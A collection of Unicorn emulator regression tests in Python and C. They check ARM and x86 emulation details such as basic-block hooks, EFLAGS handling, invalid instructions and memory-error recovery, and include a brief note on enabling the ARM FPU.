uc.reg_write(UC_ARM_REG_R2, cplen)
uc.reg_write(UC_ARM_REG_R3, 0x24)

# enable_vfp
uc.reg_write(UC_ARM_REG_C1_C0_2, uc.reg_read(UC_ARM_REG_C1_C0_2) | (0xf << 20))
uc.reg_write(UC_ARM_REG_FPEXC, 0x40000000)

uc.emu_start(base, base+len(shellcode))

fr = uc.mem_read(from_address, len(bs))
to = uc.mem_read(to_address, len(bs))
print(f"memcpy result:\nfrom: {bytes(fr)}\nto: {bytes(to)}")

unicorn-2.1.1/tests/regress/arm_movr12_hang.py

#!/usr/bin/python
from unicorn import *
from unicorn.arm_const import *
import regress

class MovHang(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
        uc.mem_map(0x1000, 0x1000)
        uc.mem_write(0x1000, '00c000e3'.decode('hex'))  # movw r12, #0

        def hook_block(uc, addr, *args):
            print 'enter block 0x%04x' % addr
            uc.count += 1

        uc.reg_write(UC_ARM_REG_R12, 0x123)
        self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x123)

        uc.hook_add(UC_HOOK_BLOCK, hook_block)
        uc.count = 0

        #print 'block should only run once'
        uc.emu_start(0x1000, 0x1004, timeout=500)

        self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x0)
        self.assertEquals(uc.count, 1)

if __name__ == '__main__':
    regress.main()
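arm_enable_vfp.c and arm_memcpy_neon.py above enable the FPU the same way before running VFP/NEON instructions: set the CP10/CP11 access bits in CPACR (exposed by Unicorn as UC_ARM_REG_C1_C0_2), then set the EN bit of FPEXC. Distilled into a reusable Python helper, the sequence looks like this (a sketch; the helper name is ours, not something the test suite defines):

    from unicorn import Uc, UC_ARCH_ARM, UC_MODE_ARM
    from unicorn.arm_const import UC_ARM_REG_C1_C0_2, UC_ARM_REG_FPEXC

    def enable_vfp(uc):
        # grant full access to coprocessors 10 and 11 (CPACR)
        uc.reg_write(UC_ARM_REG_C1_C0_2, uc.reg_read(UC_ARM_REG_C1_C0_2) | (0xf << 20))
        # set FPEXC.EN to turn the FPU on
        uc.reg_write(UC_ARM_REG_FPEXC, 0x40000000)

    uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
    enable_vfp(uc)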
unicorn-2.1.1/tests/regress/arm_vldr_invalid.py

#!/usr/bin/python
from unicorn import *
from unicorn.arm_const import *
import regress

class VldrPcInsn(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
        uc.mem_map(0x1000, 0x1000)
        uc.mem_write(0x1000, 'ed9f8a3d'.decode('hex'))  # vldr s16, [pc, #244]
        # this will raise invalid insn
        uc.emu_start(0x1000, 0x1004)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/arm_wfi_first_insn_of_tb.py

from unicorn import *
from unicorn.arm_const import *

# ADD R0, R10, R0;
# B L0;
# L0:
# ADD R0, R10, R0; <--- we stop at here, the first instruction of the next TB.
code = b'\x00\x00\x8a\xe0\xff\xff\xff\xea\x00\x00\x8a\xe0'
address = 0x1000

mu = Uc(UC_ARCH_ARM, UC_MODE_ARM)
mu.mem_map(address, 0x1000)
mu.mem_write(address, code)
mu.emu_start(address, address + len(code) - 4)

unicorn-2.1.1/tests/regress/bad_ram.py

#!/usr/bin/python
from unicorn import *
from unicorn.x86_const import *
import regress

class Hang(regress.RegressTest):
    def runTest(self):
        PAGE_SIZE = 0x5000
        CODE_ADDR = 0x400000
        RSP_ADDR = 0x200000

        binary1 = "\xCA\x24\x5D"  # retf 0x5d24

        mu = Uc(UC_ARCH_X86, UC_MODE_64)
        mu.mem_map(CODE_ADDR, PAGE_SIZE)
        mu.mem_map(RSP_ADDR, PAGE_SIZE)
        mu.mem_write(CODE_ADDR, binary1)
        mu.reg_write(UC_X86_REG_RSP, RSP_ADDR)

        try:
            self.assertEqual(mu.emu_start(CODE_ADDR, CODE_ADDR + PAGE_SIZE, 0), UC_ERR_FETCH_INVALID)
        except UcError as e:
            print("ERROR: %s" % e)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/block_test.c

#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unicorn/unicorn.h>

static int count = 1;

// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK)
// @address: address where the code is being executed
// @size: size of machine instruction being executed
// @user_data: user data passed to tracing APIs.
void cb_hookblock(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    fprintf(stderr, "# >>> Tracing basic block at 0x%"PRIx64", block size = 0x%x\n", address, size);
    if (address != 0x1000000 && address != 0x1000200) {
        fprintf(stderr, "not ok %d - address != 0x1000000 && address != 0x1000200\n", count++);
        _exit(1);
    }
    fprintf(stderr, "ok %d - address (0x%x) is start of basic block\n", count++, (uint32_t)address);
    if (size != 0x200) {
        fprintf(stderr, "not ok %d - basic block size != 0x200\n", count++);
        _exit(1);
    }
    fprintf(stderr, "ok %d - basic block size is correct\n", count++);
}

int main(void)
{
    uc_engine *uc;

    fprintf(stderr, "# basic block callback test\n");
    fprintf(stderr, "# there are only two basic blocks 0x1000000-0x10001ff and 0x1000200-0x10003ff\n");

    uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_open\n", count++);

    err = uc_mem_map(uc, 0x1000000, 4096, UC_PROT_ALL);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_mem_map\n", count++);

    uint8_t code[1024];
    //build a program that consists of 1019 nops followed by a jump -512
    //this program contains exactly 2 basic blocks, a block of 512 nops, followed
    //by a loop body containing 507 nops and jump to the top of the loop
    //the first basic block begins at address 0x1000000, and the second
    //basic block begins at address 0x1000200
    memset(code, 0x90, sizeof(code));
    memcpy(code + 1024 - 5, "\xe9\x00\xfe\xff\xff", 5);

    err = uc_mem_write(uc, 0x1000000, code, sizeof(code));
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_mem_write\n", count++);

    uc_hook h1;
    err = uc_hook_add(uc, &h1, UC_HOOK_BLOCK, cb_hookblock, NULL, 1, 0);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_hook_add\n", count++);

    err = uc_emu_start(uc, 0x1000000, 0x1000000 + sizeof(code), 0, 1030);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_emu_start\n", count++);

    fprintf(stderr, "ok %d - Done", count++);
    return 0;
}

unicorn-2.1.1/tests/regress/callback-pc.py

#!/usr/bin/env python

# reg_write() can't modify PC from within trace callbacks
# issue #210

from __future__ import print_function
from unicorn import *
from unicorn.arm_const import *

import regress

BASE_ADDRESS = 0x10000000

# sub sp, #0xc
THUMB_CODE = "\x83\xb0" * 5

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size))
    mu = user_data
    print(">>> Setting PC to 0xffffffff")
    mu.reg_write(UC_ARM_REG_PC, 0xffffffff)

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))
    mu = user_data
    print(">>> Setting PC to 0xffffffff")
    mu.reg_write(UC_ARM_REG_PC, 0xffffffff)

class CallBackPCTest(regress.RegressTest):

    def test_instruction_trace(self):
        try:
            # initialize emulator in ARM's Thumb mode
            mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

            # map some memory
            mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024)

            # write machine code to be emulated to memory
            mu.mem_write(BASE_ADDRESS, THUMB_CODE)

            # setup stack
            mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024)

            # tracing all instructions with customized callback
            mu.hook_add(UC_HOOK_CODE, hook_code, user_data=mu)

            # emulate one instruction
            mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1)

            # the instruction trace callback set PC to 0xffffffff, so at this
            # point, the PC value should be 0xffffffff.
            pc = mu.reg_read(UC_ARM_REG_PC)
            self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by instruction trace callback")

        except UcError as e:
            self.assertFalse(0, "ERROR: %s" % e)

    def test_block_trace(self):
        try:
            # initialize emulator in ARM's Thumb mode
            mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

            # map some memory
            mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024)

            # write machine code to be emulated to memory
            mu.mem_write(BASE_ADDRESS, THUMB_CODE)

            # setup stack
            mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024)

            # trace blocks with customized callback
            mu.hook_add(UC_HOOK_BLOCK, hook_block, user_data=mu)

            # emulate one instruction
            mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1)

            # the block callback set PC to 0xffffffff, so at this point, the PC
            # value should be 0xffffffff.
            pc = mu.reg_read(UC_ARM_REG_PC)
            self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by block callback")

        except UcError as e:
            self.assertFalse(0, "ERROR: %s" % e)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/crash_tb.py

#!/usr/bin/python
from unicorn import *
from unicorn.x86_const import *

import regress

CODE_ADDR = 0x0
binary1 = b'\xb8\x02\x00\x00\x00'
binary2 = b'\xb8\x01\x00\x00\x00'

class CrashTB(regress.RegressTest):
    def runTest(self):
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        mu.mem_map(CODE_ADDR, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(CODE_ADDR, binary1)

        # emu for maximum 1 sec.
        mu.emu_start(CODE_ADDR, len(binary1), UC_SECOND_SCALE)

        self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX))

        # write machine code to be emulated to memory
        mu.mem_write(CODE_ADDR, binary2)

        # emu for maximum 1 sec.
        mu.emu_start(CODE_ADDR, len(binary2), UC_SECOND_SCALE)

        self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX))

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/deadlock_1.py

#!/usr/bin/python
# From issue #1 of Ryan Hileman

from unicorn import *
import regress

CODE = b"\x90\x91\x92"

class DeadLock(regress.RegressTest):
    def runTest(self):
        mu = Uc(UC_ARCH_X86, UC_MODE_64)
        mu.mem_map(0x100000, 4 * 1024)
        mu.mem_write(0x100000, CODE)
        with self.assertRaises(UcError):
            mu.emu_start(0x100000, 0x1000 + len(CODE))

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/eflags_noset.c

#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <unicorn/unicorn.h>

#define X86_CODE32 "\x9C\x68\xFF\xFE\xFF\xFF\x9D\x9C\x58\x9D" // pushf; push ffffffeff; popf; pushf; pop eax; popf
#define ADDRESS 0x1000000
#define PAGE_8K (1 << 13)
#define PAGE_4K (1 << 12)
#define TARGET_PAGE_MASK ~(PAGE_4K - 1)
#define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK)
#define TARGET_PAGE_ALIGN(addr) (addr - (TARGET_PAGE_PREPARE(addr) - addr) & TARGET_PAGE_MASK)

#if defined(__i386__)
typedef uint32_t puint;
#define PRIX3264 PRIX32
#else
typedef uint64_t puint;
#define PRIX3264 PRIX64
#endif

uint32_t realEflags(void)
{
    puint val = 0;
#if defined(__i386__)
    puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag.
    __asm__("pushf\n\t"
            "push %0\n\t"
            "popf\n\t"
            "pushf\n\t"
            "pop %0\n\t"
            "popf"
            : "=r"(val)
            : "r"(i)
            : "%0");
#elif defined(__x86_64__)
    puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag.
    __asm__("pushfq\n\t"
            "pushq %0\n\t"
            "popfq\n\t"
            "pushfq\n\t"
            "popq %0\n\t"
            "popfq"
            : "=r"(val)
            : "r"(i)
            : "%0");
#endif
    printf("Real system eflags: 0x%08"PRIX3264"\n", val);
    return (uint32_t)val & 0xFFFFFFFF;
}

static void VM_exec(void)
{
#if defined(__i386__) || defined(__x86_64__)
    uc_engine *uc;
    uc_err err;
    unsigned int r_eax, eflags, r_esp, realflags = 0;

    r_eax = 0;
    r_esp = ADDRESS+0x100; //some safe distance from main code.
    eflags = 0x00000206;

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if(err) {
        printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err));
        return;
    }

    err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL);
    if(err != UC_ERR_OK) {
        printf("Failed to map memory %s\n", uc_strerror(err));
        return;
    }

    // write machine code to be emulated to memory
    err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1);
    if(err != UC_ERR_OK) {
        printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1);
        return;
    }

    // initialize machine registers
    uc_reg_write(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook.
    uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags);

    // emulate machine code in infinite time
    err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0);
    if(err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err));
        uc_close(uc);
        return;
    }

    uc_reg_read(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags);

    uc_close(uc);

    printf(">>> Emulation done. Below is the CPU context\n");
    printf(">>> EAX = 0x%08X\n", r_eax);
    printf(">>> EFLAGS = 0x%08X\n", eflags);

    realflags = realEflags();

    assert(r_eax == realflags);
#endif
}

int main(int argc, char *argv[])
{
    VM_exec();
    return 0;
}

unicorn-2.1.1/tests/regress/eflags_nosync.c

#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <unicorn/unicorn.h>

#define X86_CODE32 "\x33\xD2\x8A\xD4\x8B\xC8\x81\xE1\xFF\x00\x00\x00" // XOR edx,edx; MOV dl,ah; MOV ecx,eax; AND ecx,FF
#define ADDRESS 0x1000000
#define PAGE_8K (1 << 13)
#define PAGE_4K (1 << 12)
#define TARGET_PAGE_MASK ~(PAGE_4K - 1)
#define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK)
#define TARGET_PAGE_ALIGN(addr) ((addr - (TARGET_PAGE_PREPARE(addr) - addr)) & TARGET_PAGE_MASK)

static uint64_t instructions = 0;

static void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    instructions++;
}

static bool hook_invalid_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data)
{
    uc_err err;
    uint64_t address_align = TARGET_PAGE_ALIGN(address);

    if(address == 0) {
        printf("Address is 0, proof 0x%" PRIx64 "\n", address);
        return false;
    }

    switch(type) {
        default:
            return false;
            break;
        case UC_MEM_WRITE_UNMAPPED:
            printf("Mapping write address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align);
            err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL);
            if(err != UC_ERR_OK) {
                printf("Failed to map memory on UC_MEM_WRITE_UNMAPPED %s\n", uc_strerror(err));
                return false;
            }
            return true;
            break;
        case UC_MEM_READ_UNMAPPED:
            printf("Mapping read address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align);
            err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL);
            if(err != UC_ERR_OK) {
                printf("Failed to map memory on UC_MEM_READ_UNMAPPED %s\n", uc_strerror(err));
                return false;
            }
            return true;
            break;
    }
}

static void VM_exec(void)
{
    uc_engine *uc;
    uc_err err;
    uc_hook trace1, trace2;
    unsigned int r_eax, r_ebx, r_ecx, r_edx, r_ebp, r_esp, r_esi, r_edi, r_eip, eflags;
    unsigned int tr_eax, tr_ebx, tr_ecx, tr_edx, tr_ebp, tr_esp, tr_esi, tr_edi, tr_eip, t_eflags;

    r_eax = tr_eax = 0x1DB10106;
    r_ebx = tr_ebx = 0x7EFDE000;
    r_ecx = tr_ecx = 0x7EFDE000;
    r_edx = tr_edx = 0x00001DB1;
    r_ebp = tr_ebp = 0x0018FF88;
    r_esp = tr_esp = 0x0018FF14;
    r_esi = tr_esi = 0x0;
    r_edi = tr_edi = 0x0;
    r_eip = tr_eip = 0x004939F3;
    t_eflags = eflags = 0x00000206;

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if(err) {
        printf("Failed on uc_open() with error returned: %s", uc_strerror(err));
        return;
    }

    err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL);
    if(err != UC_ERR_OK) {
        printf("Failed to map memory %s", uc_strerror(err));
        return;
    }

    // write machine code to be emulated to memory
    err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1);
    if(err != UC_ERR_OK) {
        printf("Failed to write emulation code to memory, quit!: %s(len %zu)", uc_strerror(err), sizeof(X86_CODE32) - 1);
        return;
    }

    // initialize machine registers
    uc_reg_write(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx);
    uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx);
    uc_reg_write(uc, UC_X86_REG_EDX, &r_edx);
    uc_reg_write(uc, UC_X86_REG_EBP, &r_ebp);
    uc_reg_write(uc, UC_X86_REG_ESP, &r_esp);
    uc_reg_write(uc, UC_X86_REG_ESI, &r_esi);
    uc_reg_write(uc, UC_X86_REG_EDI, &r_edi);
    uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags);

    uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, (void *)hook_invalid_mem, NULL, 1, 0);

    // tracing all instruction by having @begin > @end
    uc_hook_add(uc, &trace2, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0);

    // emulate machine code in infinite time
    err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0);
    if(err) {
        printf("Failed on uc_emu_start() with error returned %u: %s", err, uc_strerror(err));
        instructions = 0;
        uc_close(uc);
        return;
    }

    uc_reg_read(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx);
    uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx);
    uc_reg_read(uc, UC_X86_REG_EDX, &r_edx);
    uc_reg_read(uc, UC_X86_REG_EBP, &r_ebp);
    uc_reg_read(uc, UC_X86_REG_ESP, &r_esp);
    uc_reg_read(uc, UC_X86_REG_ESI, &r_esi);
    uc_reg_read(uc, UC_X86_REG_EDI, &r_edi);
    uc_reg_read(uc, UC_X86_REG_EIP, &r_eip);
    uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags);

    uc_close(uc);

    printf(">>> Emulation done. Below is the CPU context\n");
    printf(">>> EAX = 0x%08X %s\n", r_eax, (r_eax == tr_eax ? "" : "(m)"));
    printf(">>> EBX = 0x%08X %s\n", r_ebx, (r_ebx == tr_ebx ? "" : "(m)"));
    printf(">>> ECX = 0x%08X %s\n", r_ecx, (r_ecx == tr_ecx ? "" : "(m)"));
    printf(">>> EDX = 0x%08X %s\n", r_edx, (r_edx == tr_edx ? "" : "(m)"));
    printf(">>> EBP = 0x%08X %s\n", r_ebp, (r_ebp == tr_ebp ? "" : "(m)"));
    printf(">>> ESP = 0x%08X %s\n", r_esp, (r_esp == tr_esp ? "" : "(m)"));
    printf(">>> ESI = 0x%08X %s\n", r_esi, (r_esi == tr_esi ? "" : "(m)"));
    printf(">>> EDI = 0x%08X %s\n", r_edi, (r_edi == tr_edi ? "" : "(m)"));
    printf(">>> EIP = 0x%08X %s\n", (r_eip - ADDRESS) + tr_eip, (r_eip == tr_eip ? "" : "(m)\n"));
    printf(">>> EFLAGS = 0x%08X %s\n", eflags, (eflags == t_eflags ? "" : "(m)"));
    printf(">>> Instructions executed %" PRIu64 "\n", instructions);

    assert(r_eax == 0x1DB10106);
    assert(r_ebx == 0x7EFDE000);
    assert(r_ecx == 0x00000006);
    assert(r_edx == 0x00000001);
    assert(r_ebp == 0x0018FF88);
    assert(r_esp == 0x0018FF14);
    assert(r_esi == 0x00000000);
    assert(r_edi == 0x00000000);
    assert(eflags == 0x00000206); //we shouldn't fail this assert, eflags should be 0x00000206 because the last AND instruction produces a non-zero result.

    instructions = 0;
}

int main(int argc, char *argv[])
{
    VM_exec();
    return 0;
}

unicorn-2.1.1/tests/regress/emu_clear_errors.c

#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unicorn/unicorn.h>

static int count = 1;

bool cb_hookunmapped(uc_engine *uc, uc_mem_type type, uint64_t address, uint32_t size, int64_t value, void *user_data)
{
    uint32_t pc = 0;
    uc_reg_read(uc, UC_X86_REG_EIP, &pc);
    fprintf(stderr, "mem unmapped: 0x%x type: %x address: 0x%"PRIx64" length: %x value: 0x%"PRIx64"\n", pc, type, address, size, value);

    uc_err err = UC_ERR_OK;
    err = uc_emu_stop(uc);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "stop not ok");
        exit(0);
    }
    return true;
}

// move esi, dword ptr [ecx + eax + 0x28]
// add esi, eax
// lea eax, dword ptr [ebp - 4]
// push eax
// push 0x40
// push 0x10
// push esi
// call some address
#define CODE "\x8B\x74\x01\x28" \
             "\x0C\xF0" \
             "\x8D\x45\xFC" \
             "\x50" \
             "\x6A\x40" \
             "\x6A\x10" \
             "\x56" \
             "\xFF\x15\x20\x20\x00\x10"

int main(void)
{
    uc_engine *uc;

    uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_open\n", count++);

    err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_mem_map: code\n", count++);

    uint8_t code[0x1000];
    memset(code, 0x0, sizeof(code));
    memcpy(code, CODE, sizeof(CODE));

    err = uc_mem_write(uc, 0x1000, code, sizeof(code));
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_mem_write: code\n", count++);

    uint32_t eip = 0x1000;
    err = uc_reg_write(uc, UC_X86_REG_EIP, &eip);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++);

    err = uc_mem_map(uc, 0x4000, 0x4000, UC_PROT_ALL);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_mem_map: stack\n", count++);

    uint8_t stack[0x4000];
    memset(stack, 0x0, sizeof(stack));

    err = uc_mem_write(uc, 0x4000, stack, sizeof(stack));
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_mem_write: stack\n", count++);

    uint32_t esp = 0x6000;
    err = uc_reg_write(uc, UC_X86_REG_ESP, &esp);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_reg_write: esp\n", count++);

    uint32_t ebp = 0x6000;
    err = uc_reg_write(uc, UC_X86_REG_EBP, &ebp);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_reg_write: ebp\n", count++);

    uc_hook h1;
    err = uc_hook_add(uc, &h1, UC_HOOK_MEM_UNMAPPED, cb_hookunmapped, NULL, 1, 0);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_hook_add\n", count++);

    // this should execute only a single instruction at 0x1000, because
    // that instruction accesses invalid memory.
    err = uc_emu_start(uc, 0x1000, 0x100F, 0, 0);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_emu_start\n", count++);

    // yes, not necessary, but to demonstrate the UC API is working as expected
    eip = 0x1004;
    err = uc_reg_write(uc, UC_X86_REG_EIP, &eip);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++);

    // this should execute the remaining instructions up to (but not including) 0x100F.
    // currently, it returns an error about an unmapped read.
    // seems that this error should have been returned in the previous call
    // to emu_start.
    err = uc_emu_start(uc, 0x1004, 0x100F, 0, 0);
    if (err != UC_ERR_OK) {
        fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err));
        exit(0);
    }
    fprintf(stderr, "ok %d - uc_emu_start\n", count++);

    fprintf(stderr, "ok %d - Done", count++);
    return 0;
}

unicorn-2.1.1/tests/regress/emu_clear_errors.py

#!/usr/bin/python
from __future__ import print_function

import binascii
import regress

from unicorn import *
from unicorn.x86_const import *

CODE = binascii.unhexlify(b"".join([
    b"8B 74 01 28",        # mov esi, dword ptr [ecx + eax + 0x28]  mapped: 0x1000
    b"03 F0",              # add esi, eax                           0x1004
    b"8D 45 FC",           # lea eax, dword ptr [ebp - 4]           0x1006
    b"50",                 # push eax                               0x1009
    b"6A 40",              # push 0x40                              0x100A
    b"6A 10",              # push 0x10                              0x100C
    b"56",                 # push esi                               0x100E
    b"FF 15 20 20 00 10"   # call some address                      0x100F
  ]).replace(" ", ""))

def showpc(mu):
    pc = mu.reg_read(UC_X86_REG_EIP)
    print("pc: 0x%x" % (pc))

class HookCodeStopEmuTest(regress.RegressTest):
    def test_hook_code_stop_emu(self):
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # base of CODE
        mu.mem_map(0x1000, 0x1000)
        mu.mem_write(0x1000, CODE)
        mu.reg_write(UC_X86_REG_EIP, 0x1000)

        # base of STACK
        mu.mem_map(0x4000, 0x4000)
        mu.mem_write(0x4000, "\x00" * 0x4000)
        mu.reg_write(UC_X86_REG_ESP, 0x6000)
        mu.reg_write(UC_X86_REG_EBP, 0x6000)

        mu.reg_write(UC_X86_REG_ECX, 0x0)
        mu.reg_write(UC_X86_REG_EAX, 0x0)

        def _hook(_, access, address, length, value, context):
            pc = mu.reg_read(UC_X86_REG_EIP)
            print("mem unmapped: pc: %x access: %x address: %x length: %x value: %x" % (
                pc, access, address, length, value))
            mu.emu_stop()
            return True

        mu.hook_add(UC_HOOK_MEM_UNMAPPED, _hook)

        # we only expect the following instruction to execute,
        # and it will fail, because it accesses unmapped memory.
        # mov esi, dword ptr [ecx + eax + 0x28]  mapped: 0x1000
        mu.emu_start(0x1000, 0x100F)
        showpc(mu)

        # now, we want to reuse the emulator, and keep executing
        # from the next instruction
        mu.reg_write(UC_X86_REG_EIP, 0x1004)
        self.assertEqual(0x1004, mu.reg_read(UC_X86_REG_EIP))

        # we expect the following instructions to execute
        # add esi, eax                  0x1004
        # lea eax, dword ptr [ebp - 4]  0x1006
        # push eax                      0x1009
        # push 0x40                     0x100A
        # push 0x10                     0x100C
        # push esi                      0x100E
        #
        # currently, a UC_ERR_READ_UNMAPPED exception is raised here
        mu.emu_start(0x1004, 0x100F)
        showpc(mu)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/emu_stop_in_hook_overrun.c

/* Test for uc_emu_stop() in code hook not always stopping the emu at the current instruction.
(Sometimes it will execute and stop at the next instruction). */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #include <process.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #include "pthread.h" #endif // _MSC_VER // common includes #include <string.h> // Test MIPS little endian code. // This should loop forever. const uint64_t addr = 0x100000; const unsigned char test_code[] = { 0x00,0x00,0x00,0x00, // 100000: nop 0x00,0x00,0x00,0x00, // 100004: nop 0x00,0x00,0x00,0x00, // 100008: nop 0x00,0x00,0x00,0x00, // 10000C: nop }; bool test_passed_ok = false; // This hook is used to show that code is executing in the emulator. static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Executing: %"PRIx64"\n", address); if( address == 0x100008 ) { printf("Stopping at: 